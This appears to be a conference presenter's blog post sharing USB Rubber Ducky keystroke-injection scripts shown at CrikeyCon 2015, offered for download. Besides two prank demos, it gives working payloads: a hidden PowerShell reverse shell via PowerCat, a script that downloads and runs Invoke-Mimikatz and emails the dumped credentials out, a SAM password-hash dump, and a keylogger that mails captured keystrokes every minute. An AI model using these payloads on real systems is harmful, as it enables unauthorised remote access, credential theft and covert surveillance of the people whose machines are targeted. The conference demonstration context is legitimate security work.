In February 2015 I presented at CrikeyCon 2015, the second year of the conference. I was extremely grateful to be asked back again.

On this page you can find all of the scripts which I demonstrated at CrikeyCon 2015. I have included links to a txt version of each script/payload, as well as an encoded version where feasible.

The following scripts are available:

  • Hello World
  • PowerCat Reverse Shell
  • Rick Roll Desktop
  • Invoke-Mimikatz
  • Dump Hashes to SD Card
  • Keylogger with email

Hello World

This script simply opens notepad.exe and then types some text for the user to read.

DELAY 500
GUI R
DELAY 500
STRING notepad
ENTER
DELAY 500
STRING Hello CrikeyCON!
ENTER
STRING Back Once Again it's the Renegade Drop Bear
ENTER
STRING In a hazy post-G20 dystopia, a small and dishevelled group emerges from the ashes of Bris Vegas.
ENTER
STRING This battle hardened core gaze upon the ruins of this once great city, and vow to rebuild, in the only way they know STRING how... by making CrikeyCon 2015 bigger and better!
ENTER

Download:
Plain Text
Encoded


PowerCat Reverse Shell

This script uses PowerShell and PowerCat to open a reverse shell to the host 192.168.56.101. This is executed in a hidden PowerShell window.

DELAY 500
CAPSLOCK 
GUI R
DELAY 500
STRING powershell.exe -ex unrestricted -WindowStyle Hidden -c "Import-Module ((Get-Volume -FileSystemLabel ducky).driveletter + ':\powercat.ps1'); powercat -c 192.168.56.101 -p 443 -ep;read-host" 
ENTER

Download:
Plain Text
Encoded


Rick Roll Desktop

This script downloads a Rick roll image and sets it as the users background. You can see the process happen (user visible). 

DELAY 500
GUI R
DELAY 500
STRING powershell.exe -WindowStyle Hidden -ex unrestricted -c "(new-Object net.webclient).downloadfile('http://2.bp.blogspot.com/-AXkkbmFRErs/TjCZIWGawfI/AAAAAAAAAlk/lT8yTGBYh38/s1600/Rick-Roll3.png', ($ENV:userprofile+'\Rick-Roll3.png'))"
ENTER
DELAY 5000
GUI R
DELAY 500
STRING %Userprofile%\Rick-Roll3.png
ENTER
DELAY 500
MENU
STRING k
ALT F4

Download:
Plain Text
Encoded


Invoke-Mimikatz

Download invoke-mimikatz, run with -dumpcreds and then email the results off. Email is sent from a Gmail address to specified email address.

This script will execute as administrator, and execution is visible to user.

There is no encoded script as you need to update your email address details.

DELAY 500
CAPSLOCK
GUI R
DELAY 500
STRING powershell -c "start-process powershell -verb runas -argumentlist '-ex bypass'"
ENTER
DELAY 500
LEFT
ENTER
DELAY 500
STRING IEX (new-Object net.webclient).downloadstring('http://j.mp/imkatz')
ENTER
STRING $body = invoke-mimikatz -dumpcreds
ENTER
STRING $PasswordSecure = ConvertTo-SecureString-String 'gmail password' -AsPlainText -Force
ENTER
STRING $cred = new-object System.Management.Automation.PSCredential('[email protected]', $PasswordSecure)
ENTER
STRING Send-MailMessage -Body $body -Subject "Katz" -SmtpServer "smtp.gmail.com"-From "[email protected]" -To "recipientemail" -Credential $cred -UseSsl
ENTER
STRING exit
ENTER

Download:
Plain Text


Dump Hashes to SD Card

This script will execute a PowerShell script that extracts SAM database passwords and the local password hashes. The results are saved to the SD Card of the Ducky. You need to have a Ducky firmware image that supports this, the SD Card needs to be named "ducky", and the PowerShell script will need to also be on the SD Card.

You need the hashdump.ps1 script, you can get it here.

DELAY 500
CAPSLOCK
GUI R
DELAY 500
STRING powershell -c "start-process powershell -verb runas -argumentlist '-ex bypass'"
ENTER
DELAY 500
LEFT
ENTER
DELAY 500
STRING IEX ((Get-Volume -FileSystemLabel ducky).driveletter + ':\hashdump.ps1')
ENTER
STRING exit
ENTER

Download:
Plain Text
Encoded


Keylogger with email

This script will start a keylogger, and deliver captured keystrokes every 1 minute. You need to have a Ducky firmware image that supports this, the SD Card needs to be named "ducky", and the PowerShell script will need to also be on the SD Card.

You need the keylogger.ps1 script, you can get it here. Please ensure you update your email details in this file.

DELAY 500
GUI R
DELAY 500
STRING powershell -c "start-process powershell -verb runas -argumentlist '-ex bypass'"
ENTER
DELAY 500
LEFT
ENTER
DELAY 500
STRING IEX ((Get-Volume -FileSystemLabel ducky).driveletter + ':\keylogger.ps1')
ENTER
STRING exit
ENTER

Download:
Plain Text
Encoded